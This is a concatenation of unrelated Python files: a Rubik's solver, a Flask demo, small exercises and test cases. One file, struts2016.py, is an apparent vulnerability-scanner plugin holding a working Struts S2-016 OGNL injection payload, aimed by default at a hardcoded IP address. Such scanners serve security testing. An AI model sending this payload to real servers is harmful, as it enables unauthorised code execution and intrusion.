| 2019-10-22T08:09:32
| 2019-10-22T08:09:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,791
|
py
|
#******************************************************************************#
# #
# :::::::: #
# solver_methods module :+: :+: #
# +:+ #
# By: pacovali <marvin@codam.nl> +#+ #
# +#+ #
# Created: 2019/01/01 00:00:00 by pacovali #+# #+# #
# Updated: 2019/01/01 00:00:00 by pacovali ######## odam.nl #
# #
#******************************************************************************#
import numpy as np
from Rubik_class import Rubik
MAX_MOVES = 20;
def compare_cubes(self) :
return (np.array_equal(self.reference.F, self.mixed.F) and
np.array_equal(self.reference.R, self.mixed.R) and
np.array_equal(self.reference.B, self.mixed.B) and
np.array_equal(self.reference.L, self.mixed.L) and
np.array_equal(self.reference.U, self.mixed.U) and
np.array_equal(self.reference.D, self.mixed.D));
def check_iterator(i, skip) :
if skip < 0 :
return (False);
if (skip % 2 == 0 and i // 3 == skip) :
return (True);
    if (skip % 2 == 1 and (skip - (i // 3) == 1 or skip - (i // 3) == 0)) :  # 'or': the original 'and' of two different equalities could never be true
return (True);
return (False);
def try_next(self, current_move_nr, allowed, inverse, solution, skip) :
current_move_nr += 1;
i = 0;
for move in allowed :
if check_iterator(i, skip) == False:
solution = np.append(solution, move);
self.mixed.choose_rotation(move);
is_equal = compare_cubes(self);
if is_equal == True:
return (np.array([True, solution]));
if is_equal == False and current_move_nr < self.peak_moves:
result = try_next(self, current_move_nr, allowed, inverse, solution, i // 3);
if (result[0] == True):
return (result);
for inv in inverse[i]:
self.mixed.choose_rotation(inv);
solution = np.delete(solution, -1);
i += 1;
current_move_nr -= 1;
return (np.array([False, solution]));
def solve(self):
solution = np.array([]);
solved = [False, solution];
while self.peak_moves < MAX_MOVES and solved[0] == False:
self.peak_moves += 1;
solved = try_next(self, 0, self.allowed, self.inverse, solution, -1);
if (solved[0] == True):
return (solved[1]);
|
[
"user@localhost.localdomain"
] |
user@localhost.localdomain
|
76d96db4057deeca5c0be5158343d8ae8cd74e65
|
e281ce2330656a6a0a7f795f535f78881df8b5ba
|
/Web/HelloWorld/Web1.py
|
e2342cf62a0c93cdd44e45b46e6c6ee836e8d8c8
|
[] |
no_license
|
sunruihua0522/SIG-PyCode
|
70db0b57bbf9ce35dc42bd8de62c5bb56a2e888e
|
483a67bf679f54ab7405c2362d9cfe47daa2bc0f
|
refs/heads/master
| 2020-07-12T14:46:32.588227
| 2020-04-02T04:37:02
| 2020-04-02T04:37:02
| 204,842,675
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 415
|
py
|
from flask import Flask, Request
app =Flask(__name__)
@app.route('/')
def HelloWold():
return 'Hello World'
@app.route('/login/')
def Login():
return 'Login......'
@app.route('/login/<int:id>/')
def LoginWithVar(id):
return '<h1>Welcome %d to my world !</h1>'%id
@app.route("/foo/<string:username>/")
def foo(username):
return "loginSteing %s"%username
app.run(host ='0.0.0.0', port = 8080)
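# --- editor's note: example requests against the routes above (host and port assumed) ---
# GET http://localhost:8080/            -> "Hello World"
# GET http://localhost:8080/login/      -> "Login......"
# GET http://localhost:8080/login/7/    -> "<h1>Welcome 7 to my world !</h1>"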
|
[
"--global"
] |
--global
|
71f98b5c6f7a6e09c70a177a86d013d601ea80b4
|
8f1137592d670ce134821106f736e231b03ead87
|
/mmdet/models/backbones/__init__.py
|
bed1d549993cacc78bc9d11bcb4b03efddd934ac
|
[
"MIT"
] |
permissive
|
mousecpn/DMC-Domain-Generalization-for-Underwater-Object-Detection
|
fa426c834fa2a5cd2fe98c50dd4dfeda64fcdc79
|
133797cfb7553557fb81a37e3c99c88154a13765
|
refs/heads/master
| 2023-05-23T16:49:34.795363
| 2023-02-13T02:23:31
| 2023-02-13T02:23:31
| 501,597,077
| 16
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,070
|
py
|
# Copyright (c) OpenMMLab. All rights reserved.
from .csp_darknet import CSPDarknet
from .darknet import Darknet
from .detectors_resnet import DetectoRS_ResNet
from .detectors_resnext import DetectoRS_ResNeXt
from .hourglass import HourglassNet
from .hrnet import HRNet
from .mobilenet_v2 import MobileNetV2
from .pvt import PyramidVisionTransformer, PyramidVisionTransformerV2
from .regnet import RegNet
from .res2net import Res2Net
from .resnest import ResNeSt
from .resnet import ResNet, ResNetV1d
from .resnext import ResNeXt
from .ssd_vgg import SSDVGG
from .swin import SwinTransformer
from .trident_resnet import TridentResNet
from .hiddenMixupResnet1 import HiddenMixupResNet,ContrastiveHiddenMixupResNet
__all__ = [
'RegNet', 'ResNet', 'ResNetV1d', 'ResNeXt', 'SSDVGG', 'HRNet',
'MobileNetV2', 'Res2Net', 'HourglassNet', 'DetectoRS_ResNet',
'DetectoRS_ResNeXt', 'Darknet', 'ResNeSt', 'TridentResNet', 'CSPDarknet',
'SwinTransformer', 'PyramidVisionTransformer', 'PyramidVisionTransformerV2','ContrastiveHiddenMixupResNet','HiddenMixupResNet'
]
|
[
"609731730@qq.com"
] |
609731730@qq.com
|
9eb0eefa8a96b1ade59c85a7d02aab823056e1af
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/119/usersdata/239/27344/submittedfiles/al1.py
|
6c815196c1dc7bc1a3f761f112f9ee81f7fa36b9
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 298
|
py
|
# -*- coding: utf-8 -*-
print("Programa de conversão de temperatura: °C -> °F")#Nome de apresentação do aplicativo
print("")
C = float(input("Digite a temperatura em °C:"))#Declarando a entrada
F = ((9*C)+160)/5#Processamento
print("O valor em °F é: %.2f"%F)#Linha para apresentar a saída
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
b650ce40f2448c5bb65139c22519be4c58cbe7dc
|
2af9c17cf29a9bba3f3e714c861e8f89ee5fc488
|
/python code/HR33_itertools_product.py
|
f9633579a94bd1807b00e7a86ee8e8966bd4a1e5
|
[] |
no_license
|
Binay28/Binay-s_Code
|
9df3315bf9433d62a3b2228ea3f87be93917e5b3
|
7e05c39a753fab79a4518119d41953827dba10c9
|
refs/heads/master
| 2022-11-18T16:00:19.325948
| 2020-07-16T12:16:38
| 2020-07-16T12:16:38
| 198,006,791
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 182
|
py
|
from itertools import product
A=list(map(int,input().split()))
B=list(map(int,input().split()))
print(*product(A,B))
#product(A, B) returns the same as ((x,y) for x in A for y in B)
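# Worked example (editor's note): input lines "1 2" and "3 4" give A = [1, 2], B = [3, 4],
# and the starred print emits: (1, 3) (1, 4) (2, 3) (2, 4)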
|
[
"45505267+Binay28@users.noreply.github.com"
] |
45505267+Binay28@users.noreply.github.com
|
548e6b996617ab7253f3a41fa7c7838b9df2aad1
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/qeyinsjZHCPEddbfe_3.py
|
101cca3e7846d04b82b150f8b95efd2e70cbf0e5
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 136
|
py
|
def dice_game(lst):
result = [0 if x == y else x + y for x, y in lst]
if 0 in result:
return 0
else:
return sum(result)
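# Editor's usage sketch: each (x, y) pair is one roll of two dice.
# dice_game([(1, 2), (3, 4)]) -> 10 (no doubles, so 3 + 7)
# dice_game([(1, 2), (5, 5)]) -> 0 (any double zeroes the whole game)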
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
52d55eaa96a718f0192d07bd30328853a449ba83
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02419/s944531801.py
|
0470606a21cac3803c17734548ec73c240969efd
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 131
|
py
|
W=raw_input()
T=[]
while 1:
x=raw_input()
if x=="END_OF_TEXT": break
T+=[v.lower() for v in x.split()]
print T.count(W)
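# Editor's note: the match is case-insensitive only on the text side, because each token
# of T is lower-cased while W is used exactly as typed. Example session:
#   W = "the", then "The cat the dog" and "END_OF_TEXT" -> prints 2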
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
f18e2900ad229eb69539225ff1271712780b26b1
|
d3efc82dfa61fb82e47c82d52c838b38b076084c
|
/Autocase_Result/Quote18/HQ_18_042.py
|
4520798521b4e456949b24bbd5c72a4af4a40a7b
|
[] |
no_license
|
nantongzyg/xtp_test
|
58ce9f328f62a3ea5904e6ed907a169ef2df9258
|
ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f
|
refs/heads/master
| 2022-11-30T08:57:45.345460
| 2020-07-30T01:43:30
| 2020-07-30T01:43:30
| 280,388,441
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,258
|
py
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import time
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from log import *
class HQ_18_042(xtp_test_case):
def subMarketData(self, Api, stk_info, case_name, rs_expect):
print Api.GetApiVersion()
def on_market_data(data, error, last):
self.print_msg(case_name, rs_expect, error)
Api.setSubMarketDataHandle(on_market_data)
Api.SubscribeMarketData(stk_info)
time.sleep(1)
def print_msg(self, case_name, rs_expect, error):
if rs_expect == error:
            logger.warning('{0} test passed!'.format(case_name))
else:
            logger.error('{0} test failed!'.format(case_name))
self.assertEqual(error, rs_expect)
def test_HQ_18_042(self):
pyname = 'HQ_18_042'
client_id = 6
Api = XTPQuoteApi(client_id)
Api.Login()
stk_info = {'ticker': '', 'exchange_id': 1}
self.subMarketData(Api, stk_info, pyname,
{'error_id': 11200003, 'error_msg': 'unknown security'}) # 0
Api.Logout()
if __name__=='__main__':
unittest.main()
|
[
"418033945@qq.com"
] |
418033945@qq.com
|
c8e514cf6371ba34c6915c2a4fa7d98162c04ef5
|
387ad3775fad21d2d8ffa3c84683d9205b6e697d
|
/testsuite/trunk/epath/set_ep_loc_012.py
|
78a9160027aee4ca102953bb975b8d0cbcdb9901
|
[] |
no_license
|
kodiyalashetty/test_iot
|
916088ceecffc17d2b6a78d49f7ea0bbd0a6d0b7
|
0ae3c2ea6081778e1005c40a9a3f6d4404a08797
|
refs/heads/master
| 2020-03-22T11:53:21.204497
| 2018-03-09T01:43:41
| 2018-03-09T01:43:41
| 140,002,491
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,928
|
py
|
#!/usr/bin/env python
"""
(C) Copyright IBM Corp. 2008
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. This
file and program are licensed under a BSD style license. See
the Copying file included with the OpenHPI distribution for
full licensing terms.
Authors:
Suntrupth S Yadav <suntrupth@in.ibm.com>
"""
"""oh_set_ep_location: Dull entity path and victim element in the middle.
Only victim element's instance number changed. """
import unittest
from openhpi import *
class TestSequence(unittest.TestCase):
def runTest(self):
y = 77002
z = 3
i = 0
ep=SaHpiEntityPathT()
#SaHpiEntityTypeT
w = SAHPI_ENT_SBC_BLADE
#SaHpiEntityLocationT
x = 56873
for i in range(0,z):
ep.Entry[i].EntityType = w
ep.Entry[i].EntityLocation = y
i=i+1
ep.Entry[z].EntityType = SAHPI_ENT_FAN
ep.Entry[z].EntityLocation = z
for i in range(z+1, SAHPI_MAX_ENTITY_PATH):
ep.Entry[i].EntityType = w
ep.Entry[i].EntityLocation = y
i=i+1
err = oh_set_ep_location(ep, SAHPI_ENT_FAN, x)
self.assertEqual (err!=None,True)
self.assertEqual (ep.Entry[z].EntityLocation != x,False)
self.assertEqual (ep.Entry[z].EntityType != SAHPI_ENT_FAN,False)
for i in range ( 0,z ):
self.assertEqual ((ep.Entry[i].EntityType != w) or
(ep.Entry[i].EntityLocation != y),False)
i=i+1
for i in range ( z+1, SAHPI_MAX_ENTITY_PATH):
self.assertEqual ((ep.Entry[i].EntityType != w) or
(ep.Entry[i].EntityLocation != y),False)
if __name__=='__main__':
unittest.main()
|
[
"suntrupth@a44bbd40-eb13-0410-a9b2-f80f2f72fa26"
] |
suntrupth@a44bbd40-eb13-0410-a9b2-f80f2f72fa26
|
b257b9fbad4c6e99eb47fc7e4b63508036ae8fe7
|
6257b3d146ecff251aabb4dc78cf66bc69d2ab31
|
/component/struts/struts2016.py
|
980725069fe7fafe8cd96a756da7fe407fcc2015
|
[
"MIT"
] |
permissive
|
bigbigx/PocCollect
|
39549107f01d313656b451bafe7657cb8c61f410
|
6b0f438e6e6005bd0adbdf3bcc97a2d808c6f9ea
|
refs/heads/master
| 2021-06-04T15:48:04.790219
| 2021-04-06T11:24:54
| 2021-04-06T11:24:54
| 63,687,713
| 0
| 0
|
MIT
| 2021-04-06T11:24:55
| 2016-07-19T11:19:43
|
Python
|
UTF-8
|
Python
| false
| false
| 2,355
|
py
|
#!/usr/bin/env python
# encoding: utf-8
from t import T
import requests
class P(T):
def __init__(self):
T.__init__(self)
keywords=['struts']
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
target_url=''
target_url = 'http://' + ip + ':' + port
if productname.get('path',''):
target_url = 'http://'+ip+':'+port+productname.get('path','')
else:
from script import linktool
listarray=linktool.getaction(target_url)
if len(listarray)>0:
target_url=listarray[0]
else:
target_url = 'http://'+ip+':'+port+'/login.action'
result = {}
timeout=3
result['result']=False
res=None
payload = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}"
print target_url
try:
headers = {"Content-Type":"application/x-www-form-urlencoded"}
r = requests.post(target_url,data=payload,headers=headers,timeout=5)
res_html = r.text
except Exception,e:
print e
return result
finally:
if res is not None:
res.close()
del res
if res_html.find("88888887") <> -1:
info = target_url + "struts016 Vul"
result['result']=True
result['VerifyInfo'] = {}
result['VerifyInfo']['type']='struts016 Vul'
result['VerifyInfo']['URL'] =target_url
result['VerifyInfo']['payload']=payload
result['VerifyInfo']['result'] =info
return result
return result
if __name__ == '__main__':
print P().verify(ip='116.213.171.228',port='80')
|
[
"nanshihui@qq.com"
] |
nanshihui@qq.com
|
8110ddd0dde5af6e6d8fb80a917983c1ae137518
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/hoxv8zaQJNMWJqnt3_1.py
|
111f3aa56f45f561eaf1e5c385c12cc977867642
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 159
|
py
|
def is_heteromecic(n,i = 0):
if n == i * (i + 1):
return True
if n < i * (i +1):
return False
i+=1
return is_heteromecic(n, i)
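# Editor's quick checks (heteromecic/pronic numbers have the form i * (i + 1)):
# is_heteromecic(12) -> True (3 * 4)
# is_heteromecic(10) -> False (falls between 2*3 = 6 and 3*4 = 12)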
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|